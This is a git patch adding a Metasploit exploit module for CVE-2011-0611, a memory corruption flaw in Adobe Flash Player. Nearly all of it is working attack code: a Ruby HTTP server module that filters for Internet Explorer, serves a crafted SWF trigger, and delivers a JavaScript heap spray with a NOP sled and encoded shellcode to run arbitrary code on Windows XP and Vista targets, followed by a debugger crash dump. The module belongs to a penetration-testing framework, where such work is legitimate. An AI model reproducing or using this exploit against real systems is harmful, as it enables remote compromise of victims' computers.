From c28e7259ac0c7abf9ecf5ee24a7f7d25133af789 Mon Sep 17 00:00:00 2001
From: Wei Chen <Wei_Chen@rapid7.com>
Date: Sat, 16 Apr 2011 02:09:33 +0000
Subject: [PATCH] Added CVE-2011-0611 Adobe Flash 0day

git-svn-id: file:///home/svn/framework3/trunk@12330 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../browser/adobe_flashplayer_flash10o.rb     | 153 ++++++++++++++++++
 1 file changed, 153 insertions(+)
 create mode 100644 modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb

diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
new file mode 100644
index 0000000000..6efc3a82a8
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -0,0 +1,153 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",
+			'Description'    => %q{
+					This module exploits a vulnerability in Adobe Flash Player that was discovered, and
+				has been exploited actively in the wild.  By embedding a specially crafted .swf file,
+				Adobe Flash crashes due to an invalid use of an object type, which allows attackers to
+				overwrite a pointer in memory, and results arbitrary code execution.
+			},
+			'License'        => MSF_LICENSE,
+			'Version'        => "$Revision$",
+			'Author'         =>
+				[
+					'sinn3r',
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2011-0611' ],
+					[ 'OSVDB', '71686' ],
+					[ 'BID', '47314' ],
+					[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],
+					[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],
+					[ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],
+					[ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],
+					[ 'URL', 'http://secunia.com/blog/210' ],
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00",
+				},
+			'DefaultOptions' =>
+				{
+					'ExitFunction'         => "process",
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'IE 6/7 on Windows XP SP3 and Windows Vista', {} ],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Apr 11 2011",
+			'DefaultTarget'  => 0))
+	end
+
+	def on_request_uri(cli, request)
+
+		agent = request.headers['User-Agent']
+		if agent !~ /MSIE \d\.\d/ and agent !~ /NT \d\.\d/
+			send_not_found(cli)
+			return
+		end
+
+		if request.uri =~ /\.swf/
+			print_status("Sending trigger SWF...")
+			send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )
+			return
+		end
+
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+		nopsled   = Rex::Text.to_unescape( [0x0c0c0c0c].pack('V') * 8 , Rex::Arch.endian(target.arch))
+
+		swf_name              = rand_text_alpha(rand(3))
+		js_func_name          = rand_text_alpha(rand(6) +3)
+		js_var_blocks_name    = rand_text_alpha(rand(6) + 3)
+		js_var_shell_name     = rand_text_alpha(rand(6) + 3)
+		js_var_nopsled_name   = rand_text_alpha(rand(6) + 3)
+		js_var_index_name     = rand_text_alpha(rand(6) + 3)
+		js_var_padding_offset = rand_text_alpha(rand(6) + 3)
+		trigger_file_name     = "#{get_resource}/#{swf_name}.swf"
+
+		html = <<-EOS
+		<html>
+		<head>
+		<script>
+		function #{js_func_name}() {
+			var #{js_var_blocks_name} = new Array();
+			var #{js_var_shell_name} = unescape("#{shellcode}");
+			var #{js_var_nopsled_name} = unescape("#{nopsled}");
+			var #{js_var_padding_offset} = #{js_var_shell_name}.length;
+			while (#{js_var_nopsled_name}.length < 0x10101) { #{js_var_nopsled_name} += unescape("#{nopsled}") };
+			#{js_var_nopsled_name} = #{js_var_nopsled_name}.substring(#{js_var_padding_offset}, #{js_var_nopsled_name}.length);
+			#{js_var_blocks_name}[0] = #{js_var_nopsled_name} + #{js_var_shell_name};
+			for (#{js_var_index_name}=1; #{js_var_index_name} < 0x802; #{js_var_index_name}++) {
+				#{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_blocks_name}[0].substring(0, #{js_var_blocks_name}[0].length);
+			}
+		}
+		#{js_func_name}();
+		</script>
+		</head>
+		<body>
+		<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"
+		codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
+		<param name="movie" value="#{trigger_file_name}" />
+		<embed src="#{trigger_file_name}" quality="high" type="application/x-shockwave-flash"
+		pluginspage="http://www.macromedia.com/go/getflashplayer">
+		</embed>
+		</body>
+		</html>
+		EOS
+
+		html = html.gsub(/^\t\t/, "")
+
+		print_status("Sending malicious HTML to #{cli.peerhost}:#{cli.peerport}")
+		send_response(cli, html, {'Content-Type' => "text/html"} )
+	end
+
+	def exploit
+		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2011-0611.swf")
+		f = File.open(path, "rb")
+		@trigger = f.read(f.stat.size)
+		f.close
+
+		super
+	end
+end
+
+
+=begin
+0:000> r
+eax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0
+eip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0         nv up ei pl nz na po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202
+Flash10o+0xd01f6:
+100d01f6 ff5008          call    dword ptr [eax+8]    ds:0023:11111118=????????
+0:000> dd ecx
+01d650b0  11111110 00000000 00000000 00000000
+01d650c0  00000000 00000000 00000000 00000000
+01d650d0  00000000 00000000 00000000 00000000
+01d650e0  00000000 00000000 00000000 00000000
+01d650f0  00000000 00000000 00000000 00000000
+01d65100  00000000 00000000 00000000 00000000
+01d65110  00000000 00000000 00000000 00000000
+01d65120  00000000 00000000 00000000 00000000
+=end
\ No newline at end of file